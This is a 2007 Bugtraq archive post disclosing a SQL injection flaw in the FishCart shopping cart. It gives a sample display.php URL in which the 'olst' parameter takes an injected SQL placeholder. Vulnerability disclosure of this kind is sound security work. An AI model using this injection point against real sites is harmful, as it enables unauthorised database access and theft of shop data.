Bugtraq mailing list archives

FishCart [injection sql]

From: saps.audit () gmail com
Date: 21 Jan 2007 19:45:59 -0000

vendor site: http://fishcart.org/
product :fish cart
bug:injection sql
risk : medium

injection sql :
/display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='[sql]

( change the cartid value with yours )

laurent gaffie
http://s-a-p.ca/
contact: saps.audit () gmail com

Current thread:

FishCart [injection sql] saps . audit (Jan 22)
- Re: FishCart [injection sql] Michael Brennen (Jan 22)